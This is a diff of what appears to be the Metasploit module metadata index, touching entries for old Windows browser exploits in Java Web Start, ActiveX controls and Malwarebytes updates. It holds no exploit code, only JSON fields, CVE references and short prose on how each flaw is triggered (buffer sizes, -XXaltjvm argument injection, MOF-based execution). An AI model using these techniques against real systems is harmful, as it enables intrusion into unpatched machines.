+ "description": "This module exploits a flaw in the new plugin component of the Sun Java\n Runtime Environment before v6 Update 22. By specifying specific parameters\n to the new plugin, an attacker can cause a stack-based buffer overflow and\n execute arbitrary code.\n\n When the new plugin is invoked with a \"launchjnlp\" parameter, it will\n copy the contents of the \"docbase\" parameter to a stack-buffer using the\n \"sprintf\" function. A string of 396 bytes is enough to overflow the 256\n byte stack buffer and overwrite some local variables as well as the saved\n return address.\n\n NOTE: The string being copied is first passed through the \"WideCharToMultiByte\".\n Due to this, only characters which have a valid localized multibyte\n representation are allowed. Invalid characters will be replaced with\n question marks ('?').\n\n This vulnerability was originally discovered independently by both Stephen\n Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn't\n been done, all versions since version 6 Update 10 are believed to be affected\n by this vulnerability.\n\n This vulnerability was patched as part of the October 2010 Oracle Patch\n release.",
"references": [
"CVE-2010-3552",
"OSVDB-68873",
@@ -145215,22 +148020,18 @@
"URL-http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html",
"ZDI-10-206",
"URL-http://code.google.com/p/skylined/issues/detail?id=23",
- "URL-http://skypher.com/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/",
+ "URL-http://web.archive.org/web/20130119152812/http://skypher.com:80/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/",
"URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Windows Universal (msvcr71.dll ROP)"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/java_docbase_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_docbase_bof",
@@ -145238,6 +148039,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145245,9 +148055,7 @@
"exploit_windows/browser/java_mixer_sequencer": {
"name": "Java MixerSequencer Object GM_Song Structure Handling Vulnerability",
"fullname": "exploit/windows/browser/java_mixer_sequencer",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 500,
"disclosure_date": "2010-03-30",
"type": "exploit",
@@ -145255,27 +148063,23 @@
"Peter Vreugdenhil",
"juan vazquez "
],
- "description": "This module exploits a flaw within the handling of MixerSequencer objects\n in Java 6u18 and before.\n\n Exploitation id done by supplying a specially crafted MIDI file within an RMF\n File. When the MixerSequencer objects is used to play the file, the GM_Song\n structure is populated with a function pointer provided by a SONG block in the\n RMF. A Midi block that contains a MIDI with a specially crafted controller event\n is used to trigger the vulnerability.\n\n When triggering the vulnerability \"ebx\" points to a fake event in the MIDI file\n which stores the shellcode. A \"jmp ebx\" from msvcr71.dll is used to make the\n exploit reliable over java updates.",
+ "description": "This module exploits a flaw within the handling of MixerSequencer objects\n in Java 6u18 and before.\n\n Exploitation id done by supplying a specially crafted MIDI file within an RMF\n File. When the MixerSequencer objects is used to play the file, the GM_Song\n structure is populated with a function pointer provided by a SONG block in the\n RMF. A Midi block that contains a MIDI with a specially crafted controller event\n is used to trigger the vulnerability.\n\n When triggering the vulnerability \"ebx\" points to a fake event in the MIDI file\n which stores the shellcode. A \"jmp ebx\" from msvcr71.dll is used to make the\n exploit reliable over java updates.",
"references": [
"CVE-2010-0842",
"OSVDB-63493",
"BID-39077",
"ZDI-10-060",
- "URL-http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/"
+ "URL-http://web.archive.org/web/20210624004250/http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/"
],
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Windows / Java 6 <=u18"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/java_mixer_sequencer.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_mixer_sequencer",
@@ -145283,6 +148087,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145290,16 +148103,14 @@
"exploit_windows/browser/java_ws_arginject_altjvm": {
"name": "Sun Java Web Start Plugin Command Line Argument Injection",
"fullname": "exploit/windows/browser/java_ws_arginject_altjvm",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 600,
"disclosure_date": "2010-04-09",
"type": "exploit",
"author": [
"jduck "
],
- "description": "This module exploits a flaw in the Web Start plugin component of Sun Java\n Web Start. The arguments passed to Java Web Start are not properly validated.\n By passing the lesser known -J option, an attacker can pass arbitrary options\n directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed\n by Ruben Santamarta, an attacker can execute arbitrary code in the context of\n an unsuspecting browser user.\n\n This vulnerability was originally discovered independently by both Ruben\n Santamarta and Tavis Ormandy. Tavis reported that all versions since version\n 6 Update 10 \"are believed to be affected by this vulnerability.\"\n\n In order for this module to work, it must be ran as root on a server that\n does not serve SMB. Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.",
+ "description": "This module exploits a flaw in the Web Start plugin component of Sun Java\n Web Start. The arguments passed to Java Web Start are not properly validated.\n By passing the lesser known -J option, an attacker can pass arbitrary options\n directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed\n by Ruben Santamarta, an attacker can execute arbitrary code in the context of\n an unsuspecting browser user.\n\n This vulnerability was originally discovered independently by both Ruben\n Santamarta and Tavis Ormandy. Tavis reported that all versions since version\n 6 Update 10 \"are believed to be affected by this vulnerability.\"\n\n In order for this module to work, it must be ran as root on a server that\n does not serve SMB. Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.",
"references": [
"CVE-2010-0886",
"CVE-2010-1423",
@@ -145311,17 +148122,13 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Automatic",
"Java Runtime on Windows x86"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_ws_arginject_altjvm",
@@ -145329,6 +148136,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145336,16 +148152,14 @@
"exploit_windows/browser/java_ws_double_quote": {
"name": "Sun Java Web Start Double Quote Injection",
"fullname": "exploit/windows/browser/java_ws_double_quote",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 600,
"disclosure_date": "2012-10-16",
"type": "exploit",
"author": [
"Rh0 "
],
- "description": "This module exploits a flaw in the Web Start component of the Sun Java\n Runtime Environment. Parameters initial-heap-size and max-heap-size in a JNLP\n file can contain a double quote which is not properly sanitized when creating\n the command line for javaw.exe. This allows the injection of the -XXaltjvm\n option to load a jvm.dll from a remote UNC path into the java process. Thus\n an attacker can execute arbitrary code in the context of a browser user.\n This flaw was fixed in Oct. 2012 and affects JRE <= 1.6.35 and <= 1.7.07.\n\n In order for this module to work, it must be run as root on a server that\n does not serve SMB (In most cases, this means non-Windows hosts). Additionally,\n the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.\n Alternatively, a UNC path containing a jvm.dll can be specified, bypassing\n the Windows limitation for the Metasploit host.",
+ "description": "This module exploits a flaw in the Web Start component of the Sun Java\n Runtime Environment. Parameters initial-heap-size and max-heap-size in a JNLP\n file can contain a double quote which is not properly sanitized when creating\n the command line for javaw.exe. This allows the injection of the -XXaltjvm\n option to load a jvm.dll from a remote UNC path into the java process. Thus\n an attacker can execute arbitrary code in the context of a browser user.\n This flaw was fixed in Oct. 2012 and affects JRE <= 1.6.35 and <= 1.7.07.\n\n In order for this module to work, it must be run as root on a server that\n does not serve SMB (In most cases, this means non-Windows hosts). Additionally,\n the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.\n Alternatively, a UNC path containing a jvm.dll can be specified, bypassing\n the Windows limitation for the Metasploit host.",
"references": [
"CVE-2012-1533",
"OSVDB-86348",
@@ -145356,17 +148170,13 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Automatic",
"Java Runtime 1.6.31 to 1.6.35 and 1.7.03 to 1.7.07 on Windows x86"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/java_ws_double_quote.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_ws_double_quote",
@@ -145374,6 +148184,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145381,16 +148200,14 @@
"exploit_windows/browser/java_ws_vmargs": {
"name": "Sun Java Web Start Plugin Command Line Argument Injection",
"fullname": "exploit/windows/browser/java_ws_vmargs",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 600,
"disclosure_date": "2012-02-14",
"type": "exploit",
"author": [
"jduck "
],
- "description": "This module exploits a flaw in the Web Start component of the Sun Java\n Runtime Environment. The arguments passed to Java Web Start are not properly\n validated, allowing injection of arbitrary arguments to the JVM.\n\n By utilizing the lesser known -J option, an attacker can take advantage of\n the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method\n allows an attacker to execute arbitrary code in the context of an unsuspecting\n browser user.\n\n In order for this module to work, it must be run as root on a server that\n does not serve SMB. Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.",
+ "description": "This module exploits a flaw in the Web Start component of the Sun Java\n Runtime Environment. The arguments passed to Java Web Start are not properly\n validated, allowing injection of arbitrary arguments to the JVM.\n\n By utilizing the lesser known -J option, an attacker can take advantage of\n the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method\n allows an attacker to execute arbitrary code in the context of an unsuspecting\n browser user.\n\n In order for this module to work, it must be run as root on a server that\n does not serve SMB. Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.",
"references": [
"CVE-2012-0500",
"OSVDB-79227",
@@ -145401,17 +148218,13 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Automatic",
"Java Runtime on Windows x86"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/java_ws_vmargs.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_ws_vmargs",
@@ -145419,6 +148232,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145426,16 +148248,14 @@
"exploit_windows/browser/juniper_sslvpn_ive_setupdll": {
"name": "Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow",
"fullname": "exploit/windows/browser/juniper_sslvpn_ive_setupdll",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2006-04-26",
"type": "exploit",
"author": [
"aushack "
],
- "description": "This module exploits a stack buffer overflow in the JuniperSetupDLL.dll\n library which is called by the JuniperSetup.ocx ActiveX\tcontrol,\n as part of the Juniper SSL-VPN (IVE) appliance. By specifying an\n overly long string to the ProductName object parameter, the stack\n is overwritten.",
+ "description": "This module exploits a stack buffer overflow in the JuniperSetupDLL.dll\n library which is called by the JuniperSetup.ocx ActiveX\tcontrol,\n as part of the Juniper SSL-VPN (IVE) appliance. By specifying an\n overly long string to the ProductName object parameter, the stack\n is overwritten.",
"references": [
"CVE-2006-2086",
"OSVDB-25001",
@@ -145445,17 +148265,13 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Windows XP Pro SP3 English",
"Debugging"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb",
"is_install_path": true,
"ref_name": "windows/browser/juniper_sslvpn_ive_setupdll",
@@ -145463,6 +148279,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145470,16 +148295,14 @@
"exploit_windows/browser/kazaa_altnet_heap": {
"name": "Kazaa Altnet Download Manager ActiveX Control Buffer Overflow",
"fullname": "exploit/windows/browser/kazaa_altnet_heap",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"MC "
],
- "description": "This module exploits a stack buffer overflow in the Altnet Download Manager ActiveX\n Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7.\n By sending an overly long string to the \"Install()\" method, an attacker may be\n able to execute arbitrary code.",
+ "description": "This module exploits a stack buffer overflow in the Altnet Download Manager ActiveX\n Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7.\n By sending an overly long string to the \"Install()\" method, an attacker may be\n able to execute arbitrary code.",
"references": [
"CVE-2007-5217",
"OSVDB-37785",
@@ -145488,16 +148311,12 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Windows XP SP0-SP2 / IE 6.0SP1 English"
],
- "mod_time": "2023-03-23 10:19:30 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/kazaa_altnet_heap.rb",
"is_install_path": true,
"ref_name": "windows/browser/kazaa_altnet_heap",
@@ -145505,6 +148324,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145512,9 +148340,7 @@
"exploit_windows/browser/keyhelp_launchtripane_exec": {
"name": "KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability",
"fullname": "exploit/windows/browser/keyhelp_launchtripane_exec",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 600,
"disclosure_date": "2012-06-26",
"type": "exploit",
@@ -145522,7 +148348,7 @@
"rgod ",
"juan vazquez "
],
- "description": "This module exploits a code execution vulnerability in the KeyScript ActiveX\n control from keyhelp.ocx. It is packaged in several products or GE, such as\n Proficy Historian 4.5, 4.0, 3.5, and 3.1, Proficy HMI/SCADA 5.1 and 5.0, Proficy\n Pulse 1.0, Proficy Batch Execution 5.6, and SI7 I/O Driver between 7.20 and 7.42.\n When the control is installed with these products, the function \"LaunchTriPane\"\n will use ShellExecute to launch \"hh.exe\", with user controlled data as parameters.\n Because of this, the \"-decompile\" option can be abused to write arbitrary files on\n the remote system.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine, and then upload another mof file, which enables Windows Management\n Instrumentation service to execute it. Please note that this module currently only\n works for Windows before Vista.\n\n On the other hand, the target host must have the WebClient service (WebDAV\n Mini-Redirector) enabled. It is enabled and automatically started by default on\n Windows XP SP3",
+ "description": "This module exploits a code execution vulnerability in the KeyScript ActiveX\n control from keyhelp.ocx. It is packaged in several products or GE, such as\n Proficy Historian 4.5, 4.0, 3.5, and 3.1, Proficy HMI/SCADA 5.1 and 5.0, Proficy\n Pulse 1.0, Proficy Batch Execution 5.6, and SI7 I/O Driver between 7.20 and 7.42.\n When the control is installed with these products, the function \"LaunchTriPane\"\n will use ShellExecute to launch \"hh.exe\", with user controlled data as parameters.\n Because of this, the \"-decompile\" option can be abused to write arbitrary files on\n the remote system.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine, and then upload another mof file, which enables Windows Management\n Instrumentation service to execute it. Please note that this module currently only\n works for Windows before Vista.\n\n On the other hand, the target host must have the WebClient service (WebDAV\n Mini-Redirector) enabled. It is enabled and automatically started by default on\n Windows XP SP3",
"references": [
"CVE-2012-2516",
"OSVDB-83311",
@@ -145533,16 +148359,12 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Automatic"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/keyhelp_launchtripane_exec",
@@ -145550,6 +148372,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": true
@@ -145557,16 +148388,14 @@
"exploit_windows/browser/logitechvideocall_start": {
"name": "Logitech VideoCall ActiveX Control Buffer Overflow",
"fullname": "exploit/windows/browser/logitechvideocall_start",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2007-05-31",
"type": "exploit",
"author": [
"MC "
],
- "description": "This module exploits a stack buffer overflow in the Logitech VideoCall ActiveX\n Control (wcamxmp.dll 2.0.3470.448). By sending an overly long string to the\n \"Start()\" method, an attacker may be able to execute arbitrary code.",
+ "description": "This module exploits a stack buffer overflow in the Logitech VideoCall ActiveX\n Control (wcamxmp.dll 2.0.3470.448). By sending an overly long string to the\n \"Start()\" method, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-2918",
"OSVDB-36820",
@@ -145575,16 +148404,12 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Windows XP Pro SP2 English"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/logitechvideocall_start.rb",
"is_install_path": true,
"ref_name": "windows/browser/logitechvideocall_start",
@@ -145592,6 +148417,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145599,16 +148433,14 @@
"exploit_windows/browser/lpviewer_url": {
"name": "iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow",
"fullname": "exploit/windows/browser/lpviewer_url",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2008-10-06",
"type": "exploit",
"author": [
"MC "
],
- "description": "This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When\n sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.",
+ "description": "This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When\n sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-4384",
"OSVDB-48946",
@@ -145618,16 +148450,12 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/lpviewer_url.rb",
"is_install_path": true,
"ref_name": "windows/browser/lpviewer_url",
@@ -145635,6 +148463,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145642,16 +148479,14 @@
"exploit_windows/browser/macrovision_downloadandexecute": {
"name": "Macrovision InstallShield Update Service Buffer Overflow",
"fullname": "exploit/windows/browser/macrovision_downloadandexecute",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2007-10-31",
"type": "exploit",
"author": [
"MC "
],
- "description": "This module exploits a stack buffer overflow in Macrovision InstallShield Update\n Service(Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to\n the DownloadAndExecute method, an attacker may be able to execute arbitrary code.",
+ "description": "This module exploits a stack buffer overflow in Macrovision InstallShield Update\n Service(Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to\n the DownloadAndExecute method, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-5660",
"OSVDB-38347"
@@ -145659,17 +148494,13 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Windows XP SP0/SP1 Pro English",
"Windows 2000 Pro English All"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/macrovision_downloadandexecute.rb",
"is_install_path": true,
"ref_name": "windows/browser/macrovision_downloadandexecute",
@@ -145677,6 +148508,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145684,9 +148524,7 @@
"exploit_windows/browser/macrovision_unsafe": {
"name": "Macrovision InstallShield Update Service ActiveX Unsafe Method",
"fullname": "exploit/windows/browser/macrovision_unsafe",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 600,
"disclosure_date": "2007-10-20",
"type": "exploit",
@@ -145702,16 +148540,12 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Automatic"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/macrovision_unsafe.rb",
"is_install_path": true,
"ref_name": "windows/browser/macrovision_unsafe",
@@ -145719,6 +148553,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145726,9 +148569,7 @@
"exploit_windows/browser/malwarebytes_update_exec": {
"name": "Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution",
"fullname": "exploit/windows/browser/malwarebytes_update_exec",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 400,
"disclosure_date": "2014-12-16",
"type": "exploit",
@@ -145737,25 +148578,21 @@
"Gabor Seljan",
"todb "
],
- "description": "This module exploits a vulnerability in the update functionality of\n Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes\n Anti-Exploit consumer 1.03.1.1220.\n Due to the lack of proper update package validation, a man-in-the-middle\n (MITM) attacker could execute arbitrary code by spoofing the update server\n data-cdn.mbamupdates.com and uploading an executable. This module has\n been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.",
+ "description": "This module exploits a vulnerability in the update functionality of\n Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes\n Anti-Exploit consumer 1.03.1.1220.\n Due to the lack of proper update package validation, a man-in-the-middle\n (MITM) attacker could execute arbitrary code by spoofing the update server\n data-cdn.mbamupdates.com and uploading an executable. This module has\n been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.",
"references": [
"CVE-2014-4936",
"OSVDB-116050",
- "URL-http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and"
+ "URL-http://web.archive.org/web/20241212224255/http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and"
],
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Windows Universal"
],
- "mod_time": "2022-06-10 08:47:41 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/malwarebytes_update_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/malwarebytes_update_exec",
@@ -145763,6 +148600,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145770,9 +148616,7 @@
"exploit_windows/browser/maxthon_history_xcs": {
"name": "Maxthon3 about:history XCS Trusted Zone Code Execution",
"fullname": "exploit/windows/browser/maxthon_history_xcs",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 600,
"disclosure_date": "2012-11-26",
"type": "exploit",
@@ -145781,7 +148625,7 @@
"sinn3r ",
"juan vazquez "
],
- "description": "Cross Context Scripting (XCS) is possible in the Maxthon about:history page.\n Injection in such privileged/trusted browser zone can be used to modify\n configuration settings and execute arbitrary commands.\n\n Please note this module only works against specific versions of XCS. Currently,\n we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.",
+ "description": "Cross Context Scripting (XCS) is possible in the Maxthon about:history page.\n Injection in such privileged/trusted browser zone can be used to modify\n configuration settings and execute arbitrary commands.\n\n Please note this module only works against specific versions of XCS. Currently,\n we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.",
"references": [
"OSVDB-88191",
"EDB-23225",
@@ -145790,16 +148634,12 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Maxthon 3 (prior to 3.3) on Windows"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/maxthon_history_xcs.rb",
"is_install_path": true,
"ref_name": "windows/browser/maxthon_history_xcs",
@@ -145807,6 +148647,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145814,16 +148663,14 @@
"exploit_windows/browser/mcafee_mcsubmgr_vsprintf": {
"name": "McAfee Subscription Manager Stack Buffer Overflow",
"fullname": "exploit/windows/browser/mcafee_mcsubmgr_vsprintf",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2006-08-01",
"type": "exploit",
"author": [
"skape "
],
- "description": "This module exploits a flaw in the McAfee Subscription Manager ActiveX control.\n Due to an unsafe use of vsprintf, it is possible to trigger a stack buffer overflow by\n passing a large string to one of the COM-exposed routines, such as IsAppExpired.\n This vulnerability was discovered by Karl Lynn of eEye.",
+ "description": "This module exploits a flaw in the McAfee Subscription Manager ActiveX control.\n Due to an unsafe use of vsprintf, it is possible to trigger a stack buffer overflow by\n passing a large string to one of the COM-exposed routines, such as IsAppExpired.\n This vulnerability was discovered by Karl Lynn of eEye.",
"references": [
"CVE-2006-3961",
"OSVDB-27698",
@@ -145832,16 +148679,12 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Windows XP SP0/SP1"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb",
"is_install_path": true,
"ref_name": "windows/browser/mcafee_mcsubmgr_vsprintf",
@@ -145849,6 +148692,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
